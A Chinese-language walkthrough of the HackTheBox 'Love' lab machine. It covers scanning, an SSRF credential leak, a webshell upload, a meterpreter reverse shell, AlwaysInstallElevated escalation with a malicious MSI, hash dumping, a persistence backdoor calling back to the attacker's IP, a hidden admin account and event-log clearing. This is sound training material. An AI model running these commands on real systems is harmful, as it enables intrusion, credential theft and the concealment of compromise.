信息收集
全端口+服务
梳理攻击面
资产扩充(domain)
-
hosts碰撞:证书泄露的域名
信息扩充(目录)
dirb http://10.10.10.239:80/dirb http://10.10.10.239:5000/dirb http://staging.love.htb/dirb http://love.htb/
漏洞探测(port)
-
弱口令,枚举猜解:139/445/135/3306
-
nday,黑盒测试:80/5000
漏洞利用(windows)
-
ms17-010
-
cve-2020-0796
nmap -p445 --script smb-vuln-ms17-010 10.10.10.239nmap -p445 --script cve-2020-0796 10.10.10.239
边界突破
-
sqli -> sqlmap -> shell (略)
-
ssrf-> 凭据 ->文件上传 -> shell
在http://staging.love.htb/beta.php通过回显SSRF拿到账号密码(略显刻意)
admin/!!!! 
登陆后台
找到上传点,上Godzilla马
http://love.htb/images/xlove.php
权限维持
MSF
use exploit/multi/handlerset PAYLOAD windows/x64/meterpreter/reverse_tcp
权限提升
错误配置提权-注册表(AlwaysInstallElevated)
注册表alwaysInstallelevated是一个策略设置项,允许低权限用户以system权限运行安装文件。启用此策略后,低权限用户能以system权限来运行恶意的 msi程序。
即当其键值为1时,计算机默认以system权限运行msi程序。
查看alwaysinstallelevated键值
# 处于开启状态reg query HKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindowsInstallerreg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstaller
上传恶意msi程序到目标环境
upload /home/kali/Desktop/HackTheBox/x.msi c:/xampp/htdocs/omrs/x.msi静默运行
msiexec /quiet /qn /i x.msi
成功获取system权限。
凭据获取
run hashdumprun windows/gather/smart_hashdump
权限维持
启动项后门
# -X 开机自启动# -i 反向连接时间间隔# -r 攻击者的IPrun persistence -X -i 2 -p 4446 -r 10.10.14.90
远程登录
# 截屏screenshot
# 开启目标机子远程桌面run getgui -erun post/windows/manage/enable_rdp
如图,3389成功开启
# 新建账户net user xLove 123456 /add# 加入管理员组net localgroup administrators xLove /add
连过去
痕迹清理
# 关闭远程桌面net user xLove /del # 删除后门账户clearev # 清楚日志
本文始发于微信公众号(don9sec):Love has been Pwned !
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论